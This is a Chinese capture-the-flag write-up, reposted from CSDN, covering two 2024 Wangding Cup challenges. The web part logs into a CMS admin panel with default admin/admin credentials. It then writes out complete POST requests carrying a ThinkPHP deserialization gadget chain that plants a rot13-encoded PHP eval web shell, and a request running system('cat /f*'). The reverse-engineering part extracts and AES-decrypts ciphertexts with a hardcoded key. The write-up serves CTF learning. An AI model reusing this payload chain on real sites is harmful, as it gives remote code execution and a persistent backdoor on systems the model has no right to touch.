0


2024网鼎杯web1+re2 wp

这两道题属于比较简单的,顺道说一下,今年的题有点抽象,web不是misc,re不是web的,也有可能时代在进步,现在要求全栈✌了吧

web1

最开始被强网的小浣熊带偏思路了,进来疯狂找sql注入,结果后台弱口令一试,

admin/admin

找了一堆POC,都打不通,进到后台试了半天文件上传也不行,最后只能针对cms版本进行攻击,找到了

https://cn-sec.com/archives/2640154.html文章,照着文章里的方法打就好了:

进左侧最下面的功能地图把栏目字段启用

POST /login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn
​
title=poc3&name=poc3&dtype=region&dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99

之后会新建一个poc3的字段,要记住这个字段的ID

然后打POC:

POST /login.php?m=admin&c=Field&a=arctype_edit&_ajax=1&lang=cn
​
title=poc3&name=poc3&old_dtype=region&dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D&old_dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99&id=545&old_name=poc3&dtype[]=region

完事之后访问/login.php?m=admin&c=Field&a=channel_edit&channel_id=-99&id=545&_ajax=1路径,返回500

之后就getshell了,

/a.php617ac73525b333bea4ac35a717dd8b0a.php?_=system('cat /f*');

Re2

拖到jar反编译工具里,发现该处存在密钥和加密方法提示(AES):

接下来就是找密文,最开始找错了:

找到这,结果出来一堆java的类名,翻了下下面的类,找到了这块:

正则提取密文

import re

# 读取文件内容

with open("pwd.txt", "r", encoding="utf-8") as file:
    content = file.read()

# 使用正则表达式提取所有括号内的内容

matches = re.findall(r'\("([^"]+)"\)', content)

# 打印或保存结果

for match in matches:
    print(match)

with open("extracted_content.txt", "w", encoding="utf-8") as output_file:
    for match in matches:
        output_file.write(match + "\n\n")

直接GPT:

直接跑

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64

# 密钥

key = b'Y4SuperSecretKey'

# 新密文列表

ciphertexts = [
    'lD0pdU19mlA1xzNMZScMow==',
    'vHTdmhywhmrERttY0v8WPA==',
    'wOd4I7sVhw5HkgZMqTQlaA==',
    'yV6xw9+tYxleD0h9egW2/XNXXL+1+pHUnuP+3m8ii1TeCMSJTegZd2igKpl+ap480ZRD/zkyXFtgSjExqvp5RTM5rjfOaEyoSArhtwuiS5U=',
    'edT1iLMQCSvyHMUjip/M/A==',
    'vHTdmhywhmrERttY0v8WPA==',
    'wOd4I7sVhw5HkgZMqTQlaA==',
    'xkXC55umWZBHWtL+x1dCCw==',
    'uX4UoCpC1vhwr9Qjgpu31uIMLuC9MMTFZdoHUgTrXfo=',
    'vHTdmhywhmrERttY0v8WPA==',
    'BLYz3Sg6p3/X/BPYNW1L7FPYr0DwjapP8ge2BnUIVgk=',
    'uX4UoCpC1vhwr9Qjgpu31uIMLuC9MMTFZdoHUgTrXfo=',
    '3EqYg7luQqWh5PuOtpGw4LUslS/TdDl5fRE1R6o557EUbcQFc0Ub6IFcpGpp/xh7',
    'yV6xw9+tYxleD0h9egW2/XSxK49PPZReLv9k58hqjT8=',
    '1sth17wAFRt4+wAGPDITmg==',
    'yV6xw9+tYxleD0h9egW2/XnNOj+AgvjLs2pu7dXzqrI=',
    'Anj05GN/w2zBXhTp7riKrGXt8cugU0ZLiec1Gs+d1JsPe9kdfQpqBwV8tlru4DIUbg2ym6/BKkXTIkIAsDbA9g==',
    'nG1R4Vi6NnBcBZ/yoHLWrQ==',
    'aa5CJ5IF6MOG2H2+e1Wdhg==',
    'KYLTetODpmvJ6F1dm/8ghQ==',
    'KYLTetODpmvJ6F1dm/8ghQ==',
    'vNXU4qrC9TvFzpRv4tbSsJW9UbGnp+utRSzGdevVAiG0wps8qiqPXXoCmmnIex25',
    'KYLTetODpmvJ6F1dm/8ghQ==',
    'vNXU4qrC9TvFzpRv4tbSsJW9UbGnp+utRSzGdevVAiG0wps8qiqPXXoCmmnIex25',
    'LUj6lY0pyGsgf7h8uGlrUTP24ysker1No7mzBIAUHjcwsEmlkBNavkjjdNx7605ybDccQ/I5izOOjOSSYUbIMA==',
    'uX4UoCpC1vhwr9Qjgpu31uIMLuC9MMTFZdoHUgTrXfo=',
    'FHbZr6+qgY3p8S52uoSwU+rzLJu/BapSVDBVcsY//3k=',
    'hllzo1U5TtIPfKWnxzEkWKPnX8SgrjiSIMuSly1LX78=',
    '3EqYg7luQqWh5PuOtpGw4LUslS/TdDl5fRE1R6o557EUbcQFc0Ub6IFcpGpp/xh7',
    '+gvewj5POa93RqmusJXQ4A==',
    'YwDUGijDV5zY3M45IJyypg=='
]

# 创建AES解密器

cipher = AES.new(key, AES.MODE_ECB)

# 解密所有密文

for ct in ciphertexts:
    ciphertext = base64.b64decode(ct)
    try:
        decrypted = unpad(cipher.decrypt(ciphertext), AES.block_size)
        print(decrypted.decode('utf-8'))
    except Exception as e:
        print(f"解密失败: {ct}, 错误: {e}")


本文转载自: https://blog.csdn.net/m0_55400802/article/details/143507022
版权归原作者 hongzh0 所有, 如有侵权,请联系我们删除。

“2024网鼎杯web1+re2 wp”的评论:

还没有评论